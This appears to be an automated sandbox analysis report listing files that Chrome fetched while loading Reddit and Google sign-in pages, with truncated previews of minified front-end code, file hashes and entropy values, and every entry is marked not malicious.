                                                  URL:https://www.redditstatic.com/shreddit/en-US/translation-feedback-modal-client-js-8ce911d1.js
                                                  Preview:import{a as e,t,_ as s,I as a,n as i,g as o,c as r,H as n,u as l,v as c,e as d}from"./shell-4994f581.js";import"./chat-mobile-xpromo-client-js-58e17cee.js";import{a as p,T as h}from"./faceplate-textarea-input-ab5075d8.js";import{s as m,x as u,c as b,I as f}from"./icon-4d9be652.js";import{u as x,k as v,j as w,l as k}from"./translations-13fc818b.js";import"./app-selector-client-js-489f074c.js";import"./club-award-confirmation-client-js-b22d6f4f.js";import"./text-input-1c750feb.js";import"./index-169ed00b.js";import"./filterNullish-3e68f24c.js";import"./index-56e4320e.js";const g=e(m),A="translation-feedback-modal",E="feedback-other-input";let S=class extends g{constructor(){super(...arguments),this.FEEDBACK_ANSWERS={incomprehensible:"Incomprehensible",slang:"Slang, idioms or expressions",grammar:"Grammar","tone of voice":"Tone of voice",other:"Other"},this.open=!1,this.selectedAnswers=new Set,this.otherFeedbackValue=""}async show(e){if(!this.open)return this.originMetadata=e,this.trackEv
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):53
                                                  Entropy (8bit):4.442279596310035
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:F03B88EFC04516ECA6D80F76699ABE56
                                                  SHA1:34A6A84E026210A1AA7758CDE2970E20DA3D43EE
                                                  SHA-256:09645BDA2C4D4E01117933F46CA94308703F17D02929FA478C1F0D65CFBD438F
                                                  SHA-512:29F75C9BB8B71EA0158D01D58D5BCEB82AA832D95DDEE25DFEBC8148EAB4F48DB392A076941FF361D16EE1178FEDBD69E5F04177AAF38694A8513BE7555FE7CA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/qr-code-persistent-button-upsell-client-css-60879cea.css
                                                  Preview:.coachmark:not(:defined)>[slot=content]{display:none}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2296)
                                                  Category:downloaded
                                                  Size (bytes):2355
                                                  Entropy (8bit):5.054666945349786
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FACEC3F4F8F186F7031666458645272A
                                                  SHA1:9EDC81B9636BEA9067F82AD3C9344E10417A014E
                                                  SHA-256:E9E39A708E4009C630E4D815BDD8EBB459AF7B1E6BF9C0AEA517C61D81705E17
                                                  SHA-512:D5451316DFD3C8ADD610BEE9E9CEBE691F699431F05DF6D9E1563E24039BB20B9BCEE1DF156C2C23E12264563C36754E67BBFF80A83D21C4325850A8D1551FD6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/post-consume-tracker-e4186985.js
                                                  Preview:import{_ as e,e as s,U as t,aF as n,aK as o,aV as i,aW as a,aX as r}from"./shell-4994f581.js";import{a as l}from"./links-27a3f3ef.js";import{s as h,x as c}from"./icon-4d9be652.js";class m{constructor(e,s){this.hasPageUnloaded=!1,this.handleIntersectionObserverEnter=()=>{this.isPostInViewport||(this.isPostInViewport=!0,this.becameVisibleOnScreenTimestamp=Date.now())},this.handleIntersectionObserverLeave=()=>{const e=this.isPostInViewport;this.isPostInViewport=!1,e&&this.handleConsume()},this.handleDocumentVisibilityChange=e=>{this.isPostInViewport&&(e?(this.hasPageUnloaded=!1,this.becameVisibleOnScreenTimestamp=Date.now()):e||this.hasPageUnloaded||this.handleConsume())},this.onBeforeUnloadCallback=()=>{this.hasPageUnloaded=!0,this.isPostInViewport&&this.handleConsume()},this.elementToTrack=e,this.SAN=s}handleConsume(){this.becameVisibleOnScreenTimestamp&&Date.now()-this.becameVisibleOnScreenTimestamp>l&&n(this.elementToTrack,this.SAN)}}class d{constructor(e){this.host=e,this.postConsume
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Unicode text, UTF-8 text, with very long lines (65508), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):395060
                                                  Entropy (8bit):5.441552127562492
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:000E64F195B8DDECEA0490F576D16EDC
                                                  SHA1:DE3872C61642DB70050159DA2C2C49F11B028296
                                                  SHA-256:B67E077B94574AB4824780AE4BDBC3FDABA0FCDA4FF179255F11A6DA5F111BEB
                                                  SHA-512:D32B182CBB2BD911AB980011FB9EF25C84755E8286B56F5A6AD3D94D1BE52B592CF6792D004825648E53FB68115129D908DD41199C303271D8FE9845381F6D46
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shell-4994f581.js
                                                  Preview:import{e,i as t,t as o,T as n,g as i,a as s,s as a,x as r,l as d,A as l,b as c,S as u,B as h,c as p,I as m,d as g,m as _,o as f}from"./icon-4d9be652.js";function E(e,t,o,n){var i,s=arguments.length,a=s<3?t:null===n?n=Object.getOwnPropertyDescriptor(t,o):n;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)a=Reflect.decorate(e,t,o,n);else for(var r=e.length-1;r>=0;r--)(i=e[r])&&(a=(s<3?i(a):s>3?i(t,o,a):i(t,o))||a);return s>3&&a&&Object.defineProperty(t,o,a),a}function v(e){var t="function"==typeof Symbol&&Symbol.iterator,o=t&&e[t],n=0;if(o)return o.call(e);if(e&&"number"==typeof e.length)return{next:function(){return e&&n>=e.length&&(e=void 0),{value:e&&e[n++],done:!e}}};throw new TypeError(t?"Object is not iterable.":"Symbol.iterator is not defined.")}function S(e){return this instanceof S?(this.v=e,this):new S(e)}function b(e,t,o){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,i=o.apply(e,t||[]),s=[];return n={},a("next"),a("t
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (1997)
                                                  Category:downloaded
                                                  Size (bytes):234307
                                                  Entropy (8bit):5.546958093153065
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6F494B003778AA76753AB74503E10422
                                                  SHA1:EF521AFE39FB79B0BE1A12C2405E88FD49D5D1DB
                                                  SHA-256:908203DF326A328E324A544EE8E1416EE7BC1EFB7A3A37C4C3A96B90E0666542
                                                  SHA-512:062F57CCDF2681DA17A047892FEFA668E428C5769819EABD0C7A960AD937C4474EE977B386598D3B383697054FA0DD499634C21338B36A512F053B85EA6D82AE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://accounts.google.com/gsi/client
                                                  Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x39d10000, 0x1dd2, ]);.var aa,ba,ca,da,t,ea,ha,ma,na;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writa
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):13
                                                  Entropy (8bit):3.238901256602631
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:1E6CD917ED71A1241E4BEDC29264BD98
                                                  SHA1:5B65037351CAEB0E5A48D963D7FFA88D0271D546
                                                  SHA-256:7D04F7431BBFA41A04BCC7E6B98B9DE0D919756C4C671C5785C99FFF45F16402
                                                  SHA-512:90E7E9F406DBB9A55B45643D6B4AFCE103CD565B33E40397B8422E3347AD3778220F8D1AE7BEFE66DB61CE796D3E22D24CBEF5FD3ECBBCB5F89A852D19F47E99
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:404 Not Found
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1235)
                                                  Category:downloaded
                                                  Size (bytes):1308
                                                  Entropy (8bit):5.1084866822412565
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:879F4844631C74EDA3C8827018E15B1E
                                                  SHA1:624CE97C9ACB3D5BB952952D8F95C2892522E6EC
                                                  SHA-256:A8609D7D64D1DC19A3E3C40BCBFB9A02EBFC887421781F80CD8007CA463C255D
                                                  SHA-512:9B0AB60B82376D9DB0AA2CB85F72DB0935F311F377DF3D0213A43FDC0FB78B85013A5A029EA6E05582B56991B80D099F75B73DAAE649EA2299C553D9287A204C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/suggested-search-queries-client-js-fb46eb9d.js
                                                  Preview:import{a as e,g$ as s,E as t,b as r,_ as i,n,e as c}from"./shell-4994f581.js";import{s as o}from"./icon-4d9be652.js";const a=e(o);let h=class extends a{constructor(){super(...arguments),this._v2Events=new s(this,(e=>{this.checkAndSendImpressionEvent(e)})),this._events=new t(this,(()=>window)),this._trackEvent=this._events.define("track-event",(async e=>{e.composedPath().includes(this)&&this.checkAndSendImpressionEvent(e.detail.details)})),this.checkAndSendImpressionEvent=e=>{if(!e.search?.impression_id)return;const{search:s,action_info:t}=e,i=JSON.parse(sessionStorage.getItem("search_impression_cache")||"[]"),n=new Set([...i]);if(n.has(s.impression_id))return;n.add(s.impression_id),sessionStorage.setItem("search_impression_cache",JSON.stringify([...n]));const c=r({source:"search",action:"create",noun:"impression_id"},{...e,search:{...s,impression_id:s.impression_id},action_info:{...t,type:this.searchTelemetrySource}});this.trackEvent(c)}}createRenderRoot(){return this}};i([n({attribute
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (29192)
                                                  Category:downloaded
                                                  Size (bytes):29259
                                                  Entropy (8bit):5.264332461195411
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D70E24AFA0646DFF101C1E3FB0F5CD5A
                                                  SHA1:F6B1CD08CF18105D84271FC89B8E01AFFAA6EAF5
                                                  SHA-256:9FD1843CD84C4AF1E4AA57A7A8EAAD050350D2C3D3BED37D46FA78392C0FF032
                                                  SHA-512:C8E83E3CFE45D53A9D5C44576818107FB8015B208A0ADB13AE180DE005B72E019F1E9A7EB04F79BABC026BC292C5C9F6D2E175912F2F879A51344A8465002573
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/mod-inline-actions-client-js-46e8a0f2.js
                                                  Preview:import"./mod-log-takedown-preview-client-js-13462cf3.js";import"./recommends-feed-client-js-679e639f.js";import"./faceplate-dropdown-menu-f991e0ba.js";import"./select-controller-fa3db659.js";import"./faceplate-shimmer-252a0dfd.js";import"./header-action-item-chat-client-js-98797a42.js";import{t,_ as e,n as i,g as s,v as o,c as a,aF as n,b as r,u as d,e as l,N as c,ah as h,dn as p,T as m,P as u,ai as b,aG as v}from"./shell-4994f581.js";import{s as g,x as A,M as k,I as y,c as f,l as R,aP as S,av as w,U as C,aV as O,aq as P,aU as $,ar as I,a as j,br as U,aX as M,a0 as x,bs as B,bN as E,z,aA as L,A as V}from"./icon-4d9be652.js";import{c as T}from"./content-action-button-5fdf727f.js";import{a7 as D}from"./club-award-confirmation-client-js-b22d6f4f.js";import{M as F}from"./distinguished-tags-28b29a34.js";import{t as H,m as W}from"./modActions-7666e3bf.js";import{i as N}from"./mod-actions-controller-3be29c73.js";import{H as _}from"./community-highlights-3e873ce7.js";import{A as q}from"./mod-b
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (1167)
                                                  Category:downloaded
                                                  Size (bytes):1225
                                                  Entropy (8bit):5.189625024690665
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:D234F7F5CF813A1535061F860CFE1EE4
                                                  SHA1:B7F6BE50DAB538432EFD0856276196B6EF0753F6
                                                  SHA-256:E55A6DB77C847AC84BAE2058D1BCA389D8F2E0B039761E37052F3A2C6C1BD5BF
                                                  SHA-512:DCE0E21F47D571F6FE6B4AAD88274BA6F1F4535FD6C4FDA989E431588EAFB9917F74AF317DD1D8F8A0CFF02DE867FC1AD1E7811B3F43223878C3CD6B372F4CA5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-post-flair-27335ad2.js
                                                  Preview:import{N as t,t as s,_ as e,n as i,T as r,e as a}from"./shell-4994f581.js";import{s as o,x as l}from"./icon-4d9be652.js";const n=t(o),d=new DOMParser;let c=class extends n{constructor(){super(...arguments),this.postId="",this.flairClass="",this.onPostFlairChange=t=>{t.postId===this.postId&&this.renderUpdatedFlair(t.updatedHtml)}}connectedCallback(){super.connectedCallback(),requestAnimationFrame((()=>{this.subscribe(r.PostFlairUpdated,this.onPostFlairChange)}))}disconnectedCallback(){super.disconnectedCallback(),this.unsubscribe(r.PostFlairUpdated,this.onPostFlairChange)}renderUpdatedFlair(t){const s=this.shadowRoot?.querySelector("slot")?.assignedElements({flatten:!0})[0];if(!t&&s)return void s.remove();const e=d.parseFromString(t,"text/html").body.firstChild;if(e){if(this.flairClass&&e instanceof HTMLElement){const t=this.flairClass.split(" ").filter((t=>!!t));e.classList.add(...t)}s?s.replaceWith(e):this.appendChild(e)}}render(){return l`<slot></slot>`}};c.styles=[s],e([i({type:Stri
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:HTML document, ASCII text, with very long lines (59781)
                                                  Category:dropped
                                                  Size (bytes):340865
                                                  Entropy (8bit):5.209081918946894
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:601BE2B68AB333DC973F9DC1B684FB0E
                                                  SHA1:93A30CADC9858899CBB265353705786A230CE430
                                                  SHA-256:7DD17C946384B46029D0B03C5265D0D28D898634D6E0754987245A44E6D1C3E0
                                                  SHA-512:A4C91513E54E089F3022FF72E9899F875D1B4345AAC705725545AF3084ECD24F31A7AAD92976630D04F1581BEBF5A4FA046CD3A968494D68DA19336E01171947
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:. <!DOCTYPE html>. <html lang="en-US" class="theme-beta">. <head prefix="og: https://ogp.me/ns#">. <title>Reddit - The heart of the internet</title>. <meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover">. <meta name="apple-mobile-web-app-capable" content="yes">. <meta name="apple-mobile-web-app-status-bar-style" content="black">. <meta name="msapplication-navbutton-color" content="#000000">. <meta name="theme-color" content="#000000">. . . . <link rel="preconnect" href="https://www.redditstatic.com/" crossorigin="anonymous" />. <link rel="dns-prefetch" href="https://www.redditstatic.com/" />. . . <script type="module" nonce="wtTMdWQfz4Un9NkZnlgc3A==">let n;Promise.resolve();let e=null;async function i(){return e||(e=async function(){if(n=window.navigation,!n){console.log("Navigation API not supported, loading polyfill");try{const{applyPolyfill:e}=awa
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (2755)
                                                  Category:downloaded
                                                  Size (bytes):2818
                                                  Entropy (8bit):5.222231398178743
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:996DC320A5D57E3551768019191B22D8
                                                  SHA1:F980203CD89A31C605988F0B2D518124DF98AD81
                                                  SHA-256:B3BB5D023BE95D817B8F34693F281A85190126B56FE1F73688304F18C47E249D
                                                  SHA-512:F4CDF5452B52F3E5A47E096198BE04B5788FCC55B3AA672673A6475EDEC0ED336B9DDBE3DBD1E01B2038C48ECC5FD6A98BB17AFF1C84C00DC4A475DF4FF78BAB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/google-one-tap-client-js-83d9ed1e.js
                                                  Preview:import{b as e,b9 as t,b0 as s,_ as i,g as o,n as a,e as r,E as n,b1 as c,ba as l,aF as p,bb as h,bc as d}from"./shell-4994f581.js";import{A as m,r as u}from"./auth-flow-controller-2182cb9c.js";import{G as g}from"./google-api-d2fdd9a3.js";import{W as w}from"./with-recaptcha-72aa2ce9.js";import{p as b}from"./password-recovery-fa619c78.js";import{O as f,J as y}from"./club-award-confirmation-client-js-b22d6f4f.js";import{s as C}from"./icon-4d9be652.js";import"./helpers-82480d34.js";const v=new Set(t.map((e=>s({source:f,action:y,noun:e})))),S=w(C);let R=class extends S{constructor(){super(...arguments),this.useCaptcha=!1,this.isEmailPermissionRequired=!1,this.hasCredentials=!1,this.googleApiController=new g(this,g.OneTapUX),this.authFlowController=new m(this),this.events=new n(this),this.showPrompt=async()=>{await this.googleApiController.initialize(),window.google?.accounts.id.prompt(this.momentListener)},this.onGoogleCredentialResponse=async e=>{let t;const{credential:s,select_by:i}=e;try
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (4029)
                                                  Category:downloaded
                                                  Size (bytes):4092
                                                  Entropy (8bit):5.255948334988873
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:05A36D5A3D32223529431884BE9EEF49
                                                  SHA1:FA98DCF900248B3EEAC34E7B72C15769F12949E7
                                                  SHA-256:19DF701B12453E14CA30EBC5492B878E1DF324A7387144BEF33C67FC25E586AB
                                                  SHA-512:009CE213DA918DFF4D61097782041251D210F9BBE68B97953E252C84660EFC3E5CC195936EB4EA79D47C378C35A5C3EFB6F1E0FC4CCA14ED635D8C5EAB983EC3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/shreddit-dynamic-ad-link-fcaf1820.js
                                                  Preview:import{b_ as t,l as e,L as n,a as o,_ as i,n as s,I as r,e as a,A as l,b$ as d,c0 as c,t as u,J as p,u as h,v as b}from"./shell-4994f581.js";import{s as y,x as k,l as g}from"./icon-4d9be652.js";import{a5 as m,t as v,a6 as f,a7 as L,q as I}from"./club-award-confirmation-client-js-b22d6f4f.js";function O(t){t&&e.setItem(n.AdEvents,JSON.stringify(t))}function x(t){t&&e.setItem(n.AdUserTargeting,JSON.stringify(t))}function S(t){const o=e.getItem(n.AdEvents);if(null===o)return null;let i;try{i=JSON.parse(o)}catch{return null}return i.impressionId!==t?null:(e.removeItem(n.AdEvents),i)}function C(){const t=e.getItem(n.AdUserTargeting);if(null===t)return null;let o;try{o=JSON.parse(t)}catch{return null}return e.removeItem(n.AdUserTargeting),o}const $="noopener nofollow sponsored",N=o(y);let A=class extends N{constructor(){super(...arguments),this.postOutboundLink="",this.impressionId="0",this.clickLocation=l.UNKNOWN,this.renderAsButton=!1,this.ButtonProps={},this.anchorStyleClass="",this.appen
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (570)
                                                  Category:downloaded
                                                  Size (bytes):631
                                                  Entropy (8bit):5.1587501746851165
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:647CFA08490924A7BB84C8D481171F08
                                                  SHA1:D61E4E08CFA9187D8E1E8B5AE15F3A47244FDFD7
                                                  SHA-256:EBAEDCF05D4730EED4829821037F25F734336B16427AF1F5266E71725B898A69
                                                  SHA-512:4EB7C01E09F42C6118738A7896F1F36026DF5130074E808EEC027B43A894A6C2C91F923F1157883EC25004CB77053EB7694188DCB14B92482352A430074E0CFE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/left-nav-topic-tracker-bdb15252.js
                                                  Preview:import{a as t,E as i,b as o,_ as s,n as e,e as n}from"./shell-4994f581.js";import{x as c,s as r}from"./icon-4d9be652.js";let p=class extends(t(r)){constructor(){super(...arguments),this.noun="topic_item",this.topic="",this.events=new i(this),this._click=this.events.define("click",this.onClick)}onClick(){this.trackEvent({...o({source:"nav",action:"click",noun:this.noun}),topic_metadata:this.topic})}render(){return c`<slot></slot>`}};s([e({type:String})],p.prototype,"noun",void 0),s([e({type:String})],p.prototype,"topic",void 0),p=s([n("left-nav-topic-tracker")],p);.//# sourceMappingURL=left-nav-topic-tracker-bdb15252.js.map.
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (533), with no line terminators
                                                  Category:downloaded
                                                  Size (bytes):533
                                                  Entropy (8bit):4.933115570682282
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:FEB698008C36A09DFE88AB06A1C3E3B9
                                                  SHA1:A871FBCBBE298AE7078D06627708B2C106A0FAF3
                                                  SHA-256:1C4E7E389D73C6ACF7F19CC812514E71230740791FDE8A018C1D7EDCCF1590AE
                                                  SHA-512:F8E3CA3E49B1C027232D1B3AAB82B5430F4A69334A5E18BEB4469C39D6A24D3F4D3FA4C473F360B619CE734977F0D7EFD03BE6ACB5EB7B9F69295FB2CBF94D9B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://accounts.google.com/gsi/style
                                                  Preview:#credential_picker_container{border:none;height:330px;position:fixed;right:20px;top:20px;width:391px;z-index:9999}#credential_picker_container iframe{border:none;width:391px;height:330px}#g_a11y_announcement{height:1px;left:-10000px;overflow:hidden;position:absolute;top:auto;width:1px}.L5Fo6c-sM5MNb{border:0;display:block;left:0;position:relative;top:0}.L5Fo6c-bF1uUb{-webkit-border-radius:4px;border-radius:4px;bottom:0;cursor:pointer;left:0;position:absolute;right:0;top:0}.L5Fo6c-bF1uUb:focus{border:none;outline:none}sentinel{}
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (10343)
                                                  Category:downloaded
                                                  Size (bytes):10396
                                                  Entropy (8bit):5.4650453448072644
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:AD5A7AF6C2A5D355C9B17BE4AC470307
                                                  SHA1:1EE26B2FC01F5E06BF7269DE23DB769EB42906B3
                                                  SHA-256:55B55508E5961C631C8807020C4DBCDE1D3579A3B92225ED5B18AEC7F409D51A
                                                  SHA-512:43E198B8D7D8DDF7B3B48C864BE4E35BA36367043CEA15F1B44346D71FAAB932E23EE96805C45F161C3FAE599D989F323996D86FEE16A90621D2C440D5AE7932
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/with-recaptcha-72aa2ce9.js
                                                  Preview:import{dT as t,_ as e,n as r,g as n,i as a,c,H as o}from"./shell-4994f581.js";import{aU as i}from"./club-award-confirmation-client-js-b22d6f4f.js";import{A as s,x as h,B as p}from"./icon-4d9be652.js";var u;let d;!function(t){t.Render="render",t.Execute="execute"}(u||(u={}));const l=new Uint8Array(16);function f(){if(!d&&(d="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto),!d))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return d(l)}var y=/^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i;const g=[];for(let t=0;t<256;++t)g.push((t+256).toString(16).slice(1));function m(t,e=0){return(g[t[e+0]]+g[t[e+1]]+g[t[e+2]]+g[t[e+3]]+"-"+g[t[e+4]]+g[t[e+5]]+"-"+g[t[e+6]]+g[t[e+7]]+"-"+g[t[e+8]]+g[t[e+9]]+"-"+g[t[e+10]]+g[t[e+11]]+g[t[e+12]]+g[t[e+13]]+g[t[e+14]]+g[t[e+15]]).toLowerCase()}function w(t){if(!function(t){
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:ASCII text, with very long lines (61121)
                                                  Category:downloaded
                                                  Size (bytes):61187
                                                  Entropy (8bit):5.262688531837321
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:3D5BC86961BA1079533D554C4FA7A8D3
                                                  SHA1:1EAC272EDDC190AF26D33E1C597CE9B7D2EA8D4B
                                                  SHA-256:C0EE3C34EE8A61A0247336652588A3C2A18E76E4C37306EC667F3DD7C80165DD
                                                  SHA-512:B50FC60E2B66D02366DE79B99422A6AACFA729B0F8C6B4F166798F2C1CA5F151B95F25EDF28B1369B48AEB69D258B9EA833D44B9B3CAA6AFBD52AFBB6B9DEEEA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/partial-feed-post-client-js-9de4a8bc.js
                                                  Preview:import{_ as t,n as e,e as o,a9 as s,aF as i,b as n,Z as r,a7 as a,a8 as d,aK as l,a as p,aV as h,u as c,v as u,t as m,g as v,av as b,I as g,aw as y,l as w,L as C,ax as P,c as S,i5 as x,T as f,bO as k,s as E,aL as B,j as I,W as T,ah as $,E as A,P as _,gF as V,r as R,H as L,J as U,aW as M,aX as F,bD as D,cH as O,a3 as j,i6 as N,gr as q,i7 as z,i8 as H,aE as W}from"./shell-4994f581.js";import{x as G,s as Y,l as J,A as X,c as Z,dY as K,D as Q,c1 as tt,Y as et,I as ot}from"./icon-4d9be652.js";import"./mod-log-takedown-preview-client-js-13462cf3.js";import"./shop-gallery-data-fetcher-client-js-a66aa4d3.js";import"./faceplate-shimmer-252a0dfd.js";import{g as st,o as it,V as nt,v as rt,a as at,u as dt,b as lt,d as pt,c as ht}from"./index-e2ec7e4b.js";import{R as ct}from"./rpl-tooltip-958cc522.js";import{a as ut}from"./awardsTelemetryState-36bf2914.js";import{a as mt}from"./mod-bulk-actions-983b8f48.js";import{P as vt}from"./rpl-popper-3f91bd17.js";import{a as bt}from"./tooltip.base-aa9be46d.js
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:JPEG image data, progressive, precision 8, 640x800, components 3
                                                  Category:dropped
                                                  Size (bytes):26676
                                                  Entropy (8bit):7.849128760440863
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:6B16B107486FFB3D716DE1B568291A44
                                                  SHA1:2A6DED94DA7DB4ACFFFC6CB620C4DBC93DBC72EE
                                                  SHA-256:F9FB1E9400B11C0F8BA99E1A6BE6DA0F10E1E27DB9F0BC57D11D28BECB549E80
                                                  SHA-512:14C103C056FA87A6320A60DE5C8749725D47E8CAB1AE4E0B8D65C41839AD2B2894E2B072211D6D233AF896B6DFBCF385F99687646ED8BAB4725D80B093ABED29
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.....C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}...... ...."...................................................................................@.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M.X^..&./.......|..-wbg3RV_2T...1............................I..[....?u...!....:Y` .wp.:.... ....'.2..~...................|$..9.}h._Jr$.U.h"2;X..m.})....1FK......m.V....f8..#G..iOf5.h8B.X.67..:,|.u.h.....D3t.>...,..v0##.\...A:....
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):1762
                                                  Entropy (8bit):7.657188588304313
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:9A8474825178DA602AAF60C2E580BFEB
                                                  SHA1:026BF060E9624567FFB0FD91BEC82BFCC975D63E
                                                  SHA-256:ADAEE912C1E50B8D748B2F01DF0C82E7E34018A4AB915EACDF7D06DA04D2FAE4
                                                  SHA-512:517FCA19EC48C34B87E925D95A31C1DB12AA48A85639ED12874256F9CE60AB6EF8B5D7F9DBA27B464AA5C93A7B25AE28A28AD8A84E2A8C1B903966ED64DFEA4D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.PNG........IHDR...0...0.....`.......PLTE....la.......'#....lb.vj.<6..........E>.......IB....@:..........($..........XP.F?.......g]...........................i_....ka.....................{o.......TK.VM.E?......-(..........lb..........uj..................%"....aX...f\......&"..........$ ...+&.........od.....x....VN.@:.....*.......C<.....t..................................WN..........TL.bX....XP....qf............................dZ.RJ...............................72.*&...................SK..............................................$!.#.....,'......4/.ZQ........w....WO.la.-)....\S....nc..........y..........vk.....u.UL.PH.........E>.........._V.B;....ka....g]....UM....i_.......................e[......`W.........%!............mc............}.o=...+tRNS...................................................pHYs................{IDATx...[.U..GK.....f&hTf...T:.e.*..v...H..&.t..\...e.s.m[F....C....e..=uq.J......Y....G.y....3.<g...s.s.r.b..}..A..k..cE........Bk.......s.t
                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  File Type:Java source, ASCII text, with very long lines (7766)
                                                  Category:downloaded
                                                  Size (bytes):7830
                                                  Entropy (8bit):5.344872103763468
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:328465B72F5FD742E796D6559A683907
                                                  SHA1:006A957BE8C670988683BD5A69C3C8E5E67B7824
                                                  SHA-256:3311309BACFEE32DBD45CE250B66BECAED7FE25C3A65E3277233F4A766899A23
                                                  SHA-512:4CF32890526D4737315615BC93E072AB74BD80F6D8D0A905E001E49EAFE49906006CB61F0E7237DC9D3148A402667D40E3D25F24764ADF87895E8571CC50DA52
                                                  Malicious:false
                                                  Reputation:unknown
                                                  URL:https://www.redditstatic.com/shreddit/en-US/expandable-section-header-e3f969c2.js
